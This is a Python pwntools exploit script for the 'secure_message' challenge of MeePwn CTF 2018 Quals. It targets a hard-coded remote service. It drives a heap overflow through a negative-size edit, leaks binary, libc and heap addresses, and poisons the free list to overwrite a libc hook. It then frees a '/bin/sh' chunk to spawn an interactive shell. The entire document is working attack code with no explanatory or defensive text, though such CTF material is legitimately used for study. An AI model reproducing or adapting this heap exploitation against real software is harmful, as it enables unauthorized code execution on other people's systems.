MeePwn CTF 2018 Quals secure_message

exploit.py

#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('./libc-2.27.so')
elf = ELF('./secure_message')
context(os='linux', arch=elf.arch)

RHOST = "178.128.87.12"
RPORT = 31337
LHOST = "127.0.0.1"
LPORT = 31337

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./secure_message'], gdbscript=gdbscript)
else:
    conn = process(['./secure_message'])
    # conn = process(['./secure_message'], env={'LD_PRELOAD': './libc-2.27.so'})
    if opt == 'a': gdb.attach(conn)

def register(name, password, desc):
    conn.sendlineafter('Choice: ', '1')
    conn.sendafter('Username:', name)
    conn.sendafter('Password:', password)
    conn.sendafter('Describe your self', desc)
def login(name, password):
    conn.sendlineafter('Choice: ', '2')
    conn.sendafter('Username:', name)
    conn.sendafter('Password:', password)
    conn.recvuntil('Hello:')

def quit():
    conn.sendlineafter('Choice: ', '3')

def add(name, size, content):
    conn.sendlineafter('Choice: ', '1')
    conn.sendlineafter('Name: ', name)
    conn.sendlineafter('Size:', str(size))
    time.sleep(0.1)
    conn.send(content)

def edit(idx, size, content):
    conn.sendlineafter('Choice: ', '3')
    conn.sendlineafter('edit?', str(idx))
    conn.sendlineafter('Size:', str(size))
    time.sleep(0.1)
    conn.send(content)

def remove(idx):
    conn.sendlineafter('Choice: ', '2')
    conn.sendlineafter('?', str(idx))

# exploit
log.info('Pwning')
register('hoge\n', 'fuga\n','a'*0x80)
register('b'*0x20,'b'*0x20,'b'*0x80)
register('c'*0x20,'c'*0x20,'c'*0x80)
register('d'*0x20,'d'*0x20,'d'*0x80)
login('hoge\n', 'fuga\n')

add('x'*0x18, 0xfd0, 'z'*0xfd0)
conn.send(p64(0xc9f68e5b26a07627))
conn.send(p64(0xc9f68e5b26a07627))
conn.send(p64(0xc9f68e5b26a07627))
add('y'*0x18, 0xfd0, 'w'*0xfd0)
conn.send(p64(0xc9f68e5b26a07627+0x1000))
conn.send(p64(0xc9f68e5b26a07627+0x1000))
conn.send(p64(0xc9f68e5b26a07627+0x1000))
edit(0, -1, 'a'*0x1f00+'\n')

add('', 0xff, '\n')
conn.send(p64(0xc9f68e5b26a07627+0x3000))
conn.send(p64(0xc9f68e5b26a07627+0x3000))
conn.send(p64(0)*4)
#conn.send(p64(0xc9f68e5b26a07627+0x2000))

conn.sendlineafter('Choice: ', '4')
conn.recvuntil('1 - [yyyyyyyyyyyyyyyyyyyyyyyy')
bin_base = u64(conn.recv(6)+'\x00\x00') - 0x211d
dbg('bin_base')
conn.recvuntil('\n')
libc_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x3ec2b0
dbg('libc_base')
conn.recv(14)
heap_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x250
dbg('heap_base')

add('aaaaaa', 0x1000, 'b'*0x1000)
conn.send(p64(0xdeadbeef000))
conn.send(p64(0xdeadbeef000))
conn.send(p64(0)*4)
add('target', 0x100, 'c'*0x1000)
conn.send(p64(0xdeadbef0000))
conn.send(p64(0xdeadbef0000))
conn.send(p64(0)*4)
edit(2, 8192, 'hoge\n')

payload = 'd'*0xfd0 + p32(0x100) + p32(1) + p64(0xe5b26a08030 + 0x10)
add('aaaaaa', 0x1100, payload+'\n')
conn.send(p64(0x00000deadbef0000-0x1000))
conn.send(p64(0x00000deadbef0000-0x1000))
conn.send(p64(0)*4)

payload = p64(0) + p64(0x31)
payload += p64(0) * 5
payload += p64(0x31)
edit(0, 0x100, payload+'\n')

remove(2)

payload = p64(0) + p64(0x31)
payload += p64(libc_base + 0x3ed8e8)+p64(0) * 4
payload += p64(0x31)
edit(0, 0x100, payload+'\n')

add('a', 0xf00, 'hoge\n')
conn.send(p64(0xbeefdead000))
conn.send(p64(0xbeefdead000))
conn.send(p64(0)*4)

add('a', 0xf00, '/bin/sh\x00\n')
conn.send(p64(0xbeefdead000))
conn.send(p64(0xbeefdead000))
conn.send(p64(libc_base+0x4f440))

conn.interactive()